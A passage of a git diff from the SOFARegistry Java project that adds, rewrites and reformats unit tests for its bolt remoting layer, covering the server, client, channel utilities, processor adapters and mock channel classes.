interfaceName.equalsIgnoreCase(interfaze.getCanonicalName()); + if (find) { + break; + } + } + } + while (!Object.class.getCanonicalName().equals(clazz.getCanonicalName()) && !find) { + // Add the super class + Class superClass = clazz.getSuperclass(); + + // Interfaces does not have java,lang.Object as superclass, they have null, so break the cycle + // and return + if (superClass == null) { + break; + } + + // Now inspect the superclass + clazz = superClass; + + find = isSpecificationInterface(clazz, interfaceName); + } + + return find; + } +} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/AsyncUserProcessorAdapterTest.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/AsyncUserProcessorAdapterTest.java new file mode 100644 index 000000000..6517808e5 --- /dev/null +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/AsyncUserProcessorAdapterTest.java @@ -0,0 +1,48 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt; + +import com.alipay.remoting.BizContext; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import java.util.concurrent.Executor; +import java.util.concurrent.Executors; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class AsyncUserProcessorAdapterTest { + @Test + public void test() throws Exception { + final ChannelHandler handler = Mockito.mock(ChannelHandler.class); + AsyncUserProcessorAdapter adapter = new AsyncUserProcessorAdapter(handler); + Assert.assertNull(adapter.interest()); + Mockito.when(handler.interest()).thenReturn(String.class); + Assert.assertEquals(adapter.interest(), String.class.getName()); + Executor executor = Executors.newCachedThreadPool(); + Mockito.when(handler.getExecutor()).thenReturn(executor); + Assert.assertEquals(adapter.getExecutor(), executor); + + final BizContext exceptionContext = Mockito.mock(BizContext.class); + Mockito.when(exceptionContext.getConnection()).thenThrow(new RuntimeException()); + TestUtils.assertException( + RuntimeException.class, () -> adapter.handleRequest(exceptionContext, null, "test")); + + BizContext context = Mockito.mock(BizContext.class); + adapter.handleRequest(context, null, "test"); + Mockito.verify(handler, Mockito.times(1)).received(Mockito.anyObject(), Mockito.anyObject()); + } +} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/BoltChannelUtilTest.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/BoltChannelUtilTest.java deleted file mode 100644 index d091f4190..000000000 --- a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/BoltChannelUtilTest.java +++ /dev/null @@ -1,53 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.remoting.bolt; - -import com.alipay.remoting.BizContext; -import com.alipay.remoting.DefaultBizContext; -import com.alipay.remoting.InvokeContext; -import com.alipay.remoting.RemotingContext; -import org.junit.Assert; -import org.junit.Test; - -import java.util.concurrent.ConcurrentHashMap; - -/** - * @author xuanbei - * @since 2019/3/26 - */ -public class BoltChannelUtilTest { - @Test - public void testGetBoltCustomSerializer() { - Assert.assertNull(BoltChannelUtil.getBoltCustomSerializer(new MockChannel())); - BoltChannel boltChannel = new BoltChannel(); - InvokeContext invokeContext = new InvokeContext(); - invokeContext.put(InvokeContext.BOLT_CUSTOM_SERIALIZER, new Object()); - RemotingContext remotingContext = new RemotingContext(new MockChannelHandlerContext(), - invokeContext, false, new ConcurrentHashMap<>()); - BizContext bizContext = new DefaultBizContext(remotingContext); - boltChannel.setBizContext(bizContext); - boolean isException = false; - try { - BoltChannelUtil.getBoltCustomSerializer(boltChannel); - } catch (Throwable r) { - isException = true; - } - Assert.assertTrue(isException); - invokeContext.put(InvokeContext.BOLT_CUSTOM_SERIALIZER, new Byte("3")); - Assert.assertEquals(new Byte("3"), BoltChannelUtil.getBoltCustomSerializer(boltChannel)); - } -} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/BoltServerTest.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/BoltServerTest.java index 36e8e3830..75351c85e 100644 --- a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/BoltServerTest.java +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/BoltServerTest.java @@ -16,64 +16,108 @@ */ package com.alipay.sofa.registry.remoting.bolt; +import com.alipay.remoting.exception.RemotingException; +import com.alipay.sofa.registry.common.model.store.URL; import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.bolt.BoltServer; +import java.net.InetSocketAddress; +import java.util.Collections; +import java.util.Map; +import org.junit.AfterClass; import org.junit.Assert; +import org.junit.BeforeClass; import org.junit.Test; -import javax.ws.rs.client.WebTarget; -import java.net.InetSocketAddress; - /** - * * @author shangyu.wh * @version $Id: BoltServerTest.java, v 0.1 2018-05-14 19:34 shangyu.wh Exp $ */ public class BoltServerTest { + private static URL url = new URL("0.0.0.0", 12345); + private static BoltServer server = new BoltServer(url, Collections.emptyList()); + + @BeforeClass + public static void before() { + server.configWaterMark(1024 * 32, 1024 * 64); + server.initServer(); + Assert.assertFalse(server.isOpen()); + Assert.assertTrue(server.isClosed()); + server.startServer(); + Assert.assertTrue(server.isOpen()); + Assert.assertFalse(server.isClosed()); + } - @Test - public void testGetChannel() { - BoltServer sessionServer = new BoltServer(null, null); - for (int i = 0; i < 30; i++) { + @AfterClass + public static void after() { + server.close(); + } - int finalI = i; - sessionServer.addChannel(new Channel() { - @Override - public InetSocketAddress getRemoteAddress() { - return new InetSocketAddress("192.168.1." + finalI, 9000); - } + @Test + public void testChannel() throws Exception { + // newInvokeContext do nothing + Assert.assertNull(server.newInvokeContext(null)); - @Override - public InetSocketAddress getLocalAddress() { - return null; - } + Assert.assertNotNull(server.getRpcServer()); + Assert.assertEquals(server.getChannels().size(), 0); + Assert.assertEquals(server.selectAvailableChannelsForHostAddress().size(), 0); + Assert.assertEquals(server.getLocalAddress().getPort(), 12345); + server.close(null); - @Override - public boolean isConnected() { - return finalI % 2 == 0; - } + BoltClient client1 = new BoltClient(2); + Assert.assertEquals(client1.getConnections().size(), 0); + TestUtils.assertException(IllegalArgumentException.class, () -> client1.connect(null)); + Assert.assertFalse(client1.isClosed()); + client1.connect(url); + Assert.assertEquals(client1.getConnections().size(), 1); + Assert.assertEquals(client1.getConnections().values().iterator().next().size(), 2); + Assert.assertNotNull(client1.getLocalAddress()); - @Override - public Object getAttribute(String key) { - return null; - } + BoltClient client2 = new BoltClient(3); + client2.connect(url); + Thread.sleep(1000); + Assert.assertEquals(5, server.getChannelCount()); + Assert.assertEquals(5, server.getChannels().size()); + Map map = server.selectAvailableChannelsForHostAddress(); + Assert.assertEquals(1, map.size()); + Channel chn = map.values().iterator().next(); + Assert.assertTrue(chn.isConnected()); + Assert.assertEquals( + chn.getLocalAddress().getAddress().getHostAddress(), map.keySet().iterator().next()); - @Override - public void setAttribute(String key, Object value) { + Channel channel = server.getChannel(new InetSocketAddress("192.168.1.1", 9000)); + Assert.assertNull(channel); - } + channel = server.getChannel(chn.getRemoteAddress()); + Assert.assertNotNull(channel); + Assert.assertTrue(channel.isConnected()); - @Override - public WebTarget getWebTarget() { - return null; - } - }); - } - sessionServer.getChannels(); - Channel channel = sessionServer.getChannel(new InetSocketAddress("192.168.1.1", 9000)); - Assert.assertNull(channel); + channel = + server.getChannel( + new URL( + chn.getRemoteAddress().getAddress().getHostAddress(), + chn.getRemoteAddress().getPort())); + Assert.assertNotNull(channel); + Assert.assertTrue(channel.isConnected()); + server.close(channel); + client1.close(); + Thread.sleep(100); + Assert.assertFalse(channel.isConnected()); + Assert.assertTrue(client1.isClosed()); + } - channel = sessionServer.getChannel(new InetSocketAddress("192.168.1.18", 9000)); - Assert.assertNotNull(channel); - } -} \ No newline at end of file + @Test + public void testException() { + Assert.assertEquals( + BoltUtil.handleException(null, null, new RemotingException("t"), "t").getCause().getClass(), + RemotingException.class); + Assert.assertEquals( + BoltUtil.handleException(null, null, new InterruptedException("t"), "t") + .getCause() + .getClass(), + InterruptedException.class); + Assert.assertEquals( + BoltUtil.handleException(null, null, new IllegalArgumentException("t"), "t") + .getCause() + .getClass(), + IllegalArgumentException.class); + } +} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/BoltUtilTest.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/BoltUtilTest.java new file mode 100644 index 000000000..91100ef15 --- /dev/null +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/BoltUtilTest.java @@ -0,0 +1,117 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt; + +import com.alipay.remoting.*; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.remoting.exchange.RequestChannelClosedException; +import com.alipay.sofa.registry.remoting.exchange.RequestException; +import com.google.common.collect.Lists; +import java.net.InetSocketAddress; +import java.util.Collections; +import java.util.concurrent.ConcurrentHashMap; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +/** + * @author xuanbei + * @since 2019/3/26 + */ +public class BoltUtilTest { + @Test + public void testGetBoltCustomSerializer() { + Assert.assertNull(BoltUtil.getBoltCustomSerializer(new MockChannel())); + BoltChannel boltChannel = new BoltChannel(null); + InvokeContext invokeContext = new InvokeContext(); + invokeContext.put(InvokeContext.BOLT_CUSTOM_SERIALIZER, new Object()); + RemotingContext remotingContext = + new RemotingContext( + new MockChannelHandlerContext(), invokeContext, false, new ConcurrentHashMap<>()); + BizContext bizContext = new DefaultBizContext(remotingContext); + boltChannel.setBizContext(bizContext); + boolean isException = false; + try { + BoltUtil.getBoltCustomSerializer(boltChannel); + } catch (Throwable r) { + isException = true; + } + Assert.assertTrue(isException); + invokeContext.put(InvokeContext.BOLT_CUSTOM_SERIALIZER, new Byte("3")); + Assert.assertEquals(new Byte("3"), BoltUtil.getBoltCustomSerializer(boltChannel)); + } + + @Test + public void testBase() { + Connection conn = Mockito.mock(Connection.class); + BoltChannel boltChannel = new BoltChannel(conn); + + AsyncContext asyncContext = Mockito.mock(AsyncContext.class); + boltChannel.setAsyncContext(asyncContext); + Assert.assertTrue(asyncContext == boltChannel.getAsyncContext()); + + BizContext bizContext = Mockito.mock(BizContext.class); + boltChannel.setBizContext(bizContext); + + Assert.assertTrue(bizContext == boltChannel.getBizContext()); + + Assert.assertNull(boltChannel.getWebTarget()); + boltChannel.close(); + Mockito.verify(conn, Mockito.times(1)).close(); + + Assert.assertNull(boltChannel.getAttribute("key")); + boltChannel.setAttribute("key", "val"); + Assert.assertEquals(boltChannel.getAttribute("key"), "val"); + boltChannel.setAttribute("key", null); + Assert.assertNull(boltChannel.getAttribute("key")); + } + + @Test + public void testCheckChannelConnected() { + TestUtils.assertException(RequestException.class, () -> BoltUtil.checkChannelConnected(null)); + Channel channel = Mockito.mock(Channel.class); + Mockito.when(channel.isConnected()).thenReturn(false); + TestUtils.assertException( + RequestChannelClosedException.class, () -> BoltUtil.checkChannelConnected(channel)); + } + + @Test + public void testCreateTargetBoltUrl() { + Channel channel = Mockito.mock(Channel.class); + Mockito.when(channel.getRemoteAddress()).thenReturn(new InetSocketAddress("127.0.0.1", 9999)); + Url url = BoltUtil.createTargetUrl(channel); + Assert.assertEquals(url.getPort(), 9999); + Assert.assertEquals(url.getIp(), "127.0.0.1"); + } + + @Test + public void testGetListenerHandlers() { + Assert.assertNull(BoltUtil.getListenerHandlers(Collections.emptyList())); + ChannelHandler handler1 = Mockito.mock(ChannelHandler.class); + Mockito.when(handler1.getType()).thenReturn(ChannelHandler.HandlerType.LISTENER); + ChannelHandler handler2 = Mockito.mock(ChannelHandler.class); + Mockito.when(handler2.getType()).thenReturn(ChannelHandler.HandlerType.PROCESSER); + + Assert.assertEquals( + BoltUtil.getListenerHandlers(Lists.newArrayList(handler1, handler2)), handler1); + + TestUtils.assertException( + IllegalArgumentException.class, + () -> BoltUtil.getListenerHandlers(Lists.newArrayList(handler1, handler1))); + } +} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/ConnectionEventAdapterTest.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/ConnectionEventAdapterTest.java new file mode 100644 index 000000000..8d6d90ab3 --- /dev/null +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/ConnectionEventAdapterTest.java @@ -0,0 +1,67 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt; + +import com.alipay.remoting.Connection; +import com.alipay.remoting.ConnectionEventType; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import org.junit.Test; +import org.mockito.Mockito; + +public class ConnectionEventAdapterTest { + @Test + public void test() throws Exception { + ChannelHandler handler = Mockito.mock(ChannelHandler.class); + Connection conn = Mockito.mock(Connection.class); + ConnectionEventAdapter adapter = + new ConnectionEventAdapter(ConnectionEventType.CONNECT, handler); + adapter.onEvent("test", conn); + Mockito.verify(handler, Mockito.times(1)).connected(Mockito.anyObject()); + Mockito.verify(handler, Mockito.times(0)).disconnected(Mockito.anyObject()); + Mockito.verify(handler, Mockito.times(0)) + .caught(Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject()); + + handler = Mockito.mock(ChannelHandler.class); + adapter = new ConnectionEventAdapter(ConnectionEventType.CONNECT_FAILED, handler); + adapter.onEvent("test", conn); + Mockito.verify(handler, Mockito.times(0)).connected(Mockito.anyObject()); + Mockito.verify(handler, Mockito.times(0)).disconnected(Mockito.anyObject()); + Mockito.verify(handler, Mockito.times(0)) + .caught(Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject()); + + handler = Mockito.mock(ChannelHandler.class); + adapter = new ConnectionEventAdapter(ConnectionEventType.CLOSE, handler); + adapter.onEvent("test", conn); + Mockito.verify(handler, Mockito.times(0)).connected(Mockito.anyObject()); + Mockito.verify(handler, Mockito.times(1)).disconnected(Mockito.anyObject()); + Mockito.verify(handler, Mockito.times(0)) + .caught(Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject()); + + handler = Mockito.mock(ChannelHandler.class); + adapter = new ConnectionEventAdapter(ConnectionEventType.EXCEPTION, handler); + adapter.onEvent("test", conn); + Mockito.verify(handler, Mockito.times(0)).connected(Mockito.anyObject()); + Mockito.verify(handler, Mockito.times(0)).disconnected(Mockito.anyObject()); + Mockito.verify(handler, Mockito.times(1)) + .caught(Mockito.anyObject(), Mockito.anyObject(), Mockito.anyObject()); + + ConnectionEventAdapter exceptionAdapter = + new ConnectionEventAdapter(ConnectionEventType.EXCEPTION, handler); + Mockito.when(conn.getLocalPort()).thenThrow(new RuntimeException()); + TestUtils.assertException(RuntimeException.class, () -> exceptionAdapter.onEvent("test", conn)); + } +} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/InvokeCallbackHandlerTest.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/InvokeCallbackHandlerTest.java new file mode 100644 index 000000000..bc3b63ebc --- /dev/null +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/InvokeCallbackHandlerTest.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt; + +import com.alipay.sofa.registry.remoting.CallbackHandler; +import com.alipay.sofa.registry.remoting.Channel; +import org.junit.Test; +import org.mockito.Mockito; + +public class InvokeCallbackHandlerTest { + @Test + public void test() { + Channel channel = Mockito.mock(Channel.class); + CallbackHandler callbackHandler = Mockito.mock(CallbackHandler.class); + InvokeCallbackHandler handler = new InvokeCallbackHandler(channel, callbackHandler); + + handler.onResponse(null); + Mockito.verify(callbackHandler, Mockito.times(1)) + .onCallback(Mockito.anyObject(), Mockito.anyObject()); + Mockito.verify(callbackHandler, Mockito.times(0)) + .onException(Mockito.anyObject(), Mockito.anyObject()); + Mockito.verify(callbackHandler, Mockito.times(0)).getExecutor(); + + handler.onException(null); + Mockito.verify(callbackHandler, Mockito.times(1)) + .onCallback(Mockito.anyObject(), Mockito.anyObject()); + Mockito.verify(callbackHandler, Mockito.times(1)) + .onException(Mockito.anyObject(), Mockito.anyObject()); + Mockito.verify(callbackHandler, Mockito.times(0)).getExecutor(); + + handler.getExecutor(); + Mockito.verify(callbackHandler, Mockito.times(1)) + .onCallback(Mockito.anyObject(), Mockito.anyObject()); + Mockito.verify(callbackHandler, Mockito.times(1)) + .onException(Mockito.anyObject(), Mockito.anyObject()); + Mockito.verify(callbackHandler, Mockito.times(1)).getExecutor(); + } +} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/MockChannel.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/MockChannel.java index b36f74838..2fd85db83 100644 --- a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/MockChannel.java +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/MockChannel.java @@ -17,42 +17,42 @@ package com.alipay.sofa.registry.remoting.bolt; import com.alipay.sofa.registry.remoting.Channel; - -import javax.ws.rs.client.WebTarget; import java.net.InetSocketAddress; +import javax.ws.rs.client.WebTarget; /** * @author xuanbei * @since 2019/3/26 */ public class MockChannel implements Channel { - @Override - public InetSocketAddress getRemoteAddress() { - return null; - } - - @Override - public InetSocketAddress getLocalAddress() { - return null; - } - - @Override - public boolean isConnected() { - return false; - } - - @Override - public Object getAttribute(String key) { - return null; - } - - @Override - public void setAttribute(String key, Object value) { - - } - - @Override - public WebTarget getWebTarget() { - return null; - } + @Override + public InetSocketAddress getRemoteAddress() { + return null; + } + + @Override + public InetSocketAddress getLocalAddress() { + return null; + } + + @Override + public boolean isConnected() { + return false; + } + + @Override + public Object getAttribute(String key) { + return null; + } + + @Override + public void setAttribute(String key, Object value) {} + + @Override + public WebTarget getWebTarget() { + return null; + } + + @Override + public void close() {} } diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/MockChannelHandlerContext.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/MockChannelHandlerContext.java index 40befa716..ce857e9be 100644 --- a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/MockChannelHandlerContext.java +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/MockChannelHandlerContext.java @@ -27,7 +27,6 @@ import io.netty.util.Attribute; import io.netty.util.AttributeKey; import io.netty.util.concurrent.EventExecutor; - import java.net.SocketAddress; /** @@ -35,209 +34,209 @@ * @since 2019/3/27 */ public class MockChannelHandlerContext implements ChannelHandlerContext { - @Override - public Channel channel() { - return null; - } - - @Override - public EventExecutor executor() { - return null; - } - - @Override - public String name() { - return null; - } - - @Override - public ChannelHandler handler() { - return null; - } - - @Override - public boolean isRemoved() { - return false; - } - - @Override - public ChannelHandlerContext fireChannelRegistered() { - return null; - } - - @Override - public ChannelHandlerContext fireChannelUnregistered() { - return null; - } - - @Override - public ChannelHandlerContext fireChannelActive() { - return null; - } - - @Override - public ChannelHandlerContext fireChannelInactive() { - return null; - } - - @Override - public ChannelHandlerContext fireExceptionCaught(Throwable cause) { - return null; - } - - @Override - public ChannelHandlerContext fireUserEventTriggered(Object evt) { - return null; - } - - @Override - public ChannelHandlerContext fireChannelRead(Object msg) { - return null; - } - - @Override - public ChannelHandlerContext fireChannelReadComplete() { - return null; - } - - @Override - public ChannelHandlerContext fireChannelWritabilityChanged() { - return null; - } - - @Override - public ChannelFuture bind(SocketAddress localAddress) { - return null; - } - - @Override - public ChannelFuture connect(SocketAddress remoteAddress) { - return null; - } - - @Override - public ChannelFuture connect(SocketAddress remoteAddress, SocketAddress localAddress) { - return null; - } - - @Override - public ChannelFuture disconnect() { - return null; - } - - @Override - public ChannelFuture close() { - return null; - } - - @Override - public ChannelFuture deregister() { - return null; - } - - @Override - public ChannelFuture bind(SocketAddress localAddress, ChannelPromise promise) { - return null; - } - - @Override - public ChannelFuture connect(SocketAddress remoteAddress, ChannelPromise promise) { - return null; - } - - @Override - public ChannelFuture connect(SocketAddress remoteAddress, SocketAddress localAddress, - ChannelPromise promise) { - return null; - } - - @Override - public ChannelFuture disconnect(ChannelPromise promise) { - return null; - } - - @Override - public ChannelFuture close(ChannelPromise promise) { - return null; - } - - @Override - public ChannelFuture deregister(ChannelPromise promise) { - return null; - } - - @Override - public ChannelHandlerContext read() { - return null; - } - - @Override - public ChannelFuture write(Object msg) { - return null; - } - - @Override - public ChannelFuture write(Object msg, ChannelPromise promise) { - return null; - } - - @Override - public ChannelHandlerContext flush() { - return null; - } - - @Override - public ChannelFuture writeAndFlush(Object msg, ChannelPromise promise) { - return null; - } - - @Override - public ChannelFuture writeAndFlush(Object msg) { - return null; - } - - @Override - public ChannelPromise newPromise() { - return null; - } - - @Override - public ChannelProgressivePromise newProgressivePromise() { - return null; - } - - @Override - public ChannelFuture newSucceededFuture() { - return null; - } - - @Override - public ChannelFuture newFailedFuture(Throwable cause) { - return null; - } - - @Override - public ChannelPromise voidPromise() { - return null; - } - - @Override - public ChannelPipeline pipeline() { - return null; - } - - @Override - public ByteBufAllocator alloc() { - return null; - } - - @Override - public Attribute attr(AttributeKey key) { - return null; - } - - @Override - public boolean hasAttr(AttributeKey key) { - return false; - } + @Override + public Channel channel() { + return null; + } + + @Override + public EventExecutor executor() { + return null; + } + + @Override + public String name() { + return null; + } + + @Override + public ChannelHandler handler() { + return null; + } + + @Override + public boolean isRemoved() { + return false; + } + + @Override + public ChannelHandlerContext fireChannelRegistered() { + return null; + } + + @Override + public ChannelHandlerContext fireChannelUnregistered() { + return null; + } + + @Override + public ChannelHandlerContext fireChannelActive() { + return null; + } + + @Override + public ChannelHandlerContext fireChannelInactive() { + return null; + } + + @Override + public ChannelHandlerContext fireExceptionCaught(Throwable cause) { + return null; + } + + @Override + public ChannelHandlerContext fireUserEventTriggered(Object evt) { + return null; + } + + @Override + public ChannelHandlerContext fireChannelRead(Object msg) { + return null; + } + + @Override + public ChannelHandlerContext fireChannelReadComplete() { + return null; + } + + @Override + public ChannelHandlerContext fireChannelWritabilityChanged() { + return null; + } + + @Override + public ChannelFuture bind(SocketAddress localAddress) { + return null; + } + + @Override + public ChannelFuture connect(SocketAddress remoteAddress) { + return null; + } + + @Override + public ChannelFuture connect(SocketAddress remoteAddress, SocketAddress localAddress) { + return null; + } + + @Override + public ChannelFuture disconnect() { + return null; + } + + @Override + public ChannelFuture close() { + return null; + } + + @Override + public ChannelFuture deregister() { + return null; + } + + @Override + public ChannelFuture bind(SocketAddress localAddress, ChannelPromise promise) { + return null; + } + + @Override + public ChannelFuture connect(SocketAddress remoteAddress, ChannelPromise promise) { + return null; + } + + @Override + public ChannelFuture connect( + SocketAddress remoteAddress, SocketAddress localAddress, ChannelPromise promise) { + return null; + } + + @Override + public ChannelFuture disconnect(ChannelPromise promise) { + return null; + } + + @Override + public ChannelFuture close(ChannelPromise promise) { + return null; + } + + @Override + public ChannelFuture deregister(ChannelPromise promise) { + return null; + } + + @Override + public ChannelHandlerContext read() { + return null; + } + + @Override + public ChannelFuture write(Object msg) { + return null; + } + + @Override + public ChannelFuture write(Object msg, ChannelPromise promise) { + return null; + } + + @Override + public ChannelHandlerContext flush() { + return null; + } + + @Override + public ChannelFuture writeAndFlush(Object msg, ChannelPromise promise) { + return null; + } + + @Override + public ChannelFuture writeAndFlush(Object msg) { + return null; + } + + @Override + public ChannelPromise newPromise() { + return null; + } + + @Override + public ChannelProgressivePromise newProgressivePromise() { + return null; + } + + @Override + public ChannelFuture newSucceededFuture() { + return null; + } + + @Override + public ChannelFuture newFailedFuture(Throwable cause) { + return null; + } + + @Override + public ChannelPromise voidPromise() { + return null; + } + + @Override + public ChannelPipeline pipeline() { + return null; + } + + @Override + public ByteBufAllocator alloc() { + return null; + } + + @Override + public Attribute attr(AttributeKey key) { + return null; + } + + @Override + public boolean hasAttr(AttributeKey key) { + return false; + } } diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/SyncUserProcessorAdapterTest.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/SyncUserProcessorAdapterTest.java new file mode 100644 index 000000000..c93dca417 --- /dev/null +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/SyncUserProcessorAdapterTest.java @@ -0,0 +1,48 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt; + +import com.alipay.remoting.BizContext; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import java.util.concurrent.Executor; +import java.util.concurrent.Executors; +import org.junit.Assert; +import org.junit.Test; +import org.mockito.Mockito; + +public class SyncUserProcessorAdapterTest { + @Test + public void test() throws Exception { + final ChannelHandler handler = Mockito.mock(ChannelHandler.class); + SyncUserProcessorAdapter adapter = new SyncUserProcessorAdapter(handler); + Assert.assertNull(adapter.interest()); + Mockito.when(handler.interest()).thenReturn(String.class); + Assert.assertEquals(adapter.interest(), String.class.getName()); + Executor executor = Executors.newCachedThreadPool(); + Mockito.when(handler.getExecutor()).thenReturn(executor); + Assert.assertEquals(adapter.getExecutor(), executor); + + final BizContext exceptionContext = Mockito.mock(BizContext.class); + Mockito.when(exceptionContext.getConnection()).thenThrow(new RuntimeException()); + TestUtils.assertRunException( + RuntimeException.class, () -> adapter.handleRequest(exceptionContext, "test")); + + BizContext context = Mockito.mock(BizContext.class); + adapter.handleRequest(context, "test"); + Mockito.verify(handler, Mockito.times(1)).reply(Mockito.anyObject(), Mockito.anyObject()); + } +} diff --git a/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/TestUtils.java b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/TestUtils.java new file mode 100644 index 000000000..a560028e0 --- /dev/null +++ b/server/remoting/bolt/src/test/java/com/alipay/sofa/registry/remoting/bolt/TestUtils.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.remoting.bolt; + +import org.junit.Assert; + +public class TestUtils { + public static void assertException(Class eclazz, Runnable runnable) { + try { + runnable.run(); + 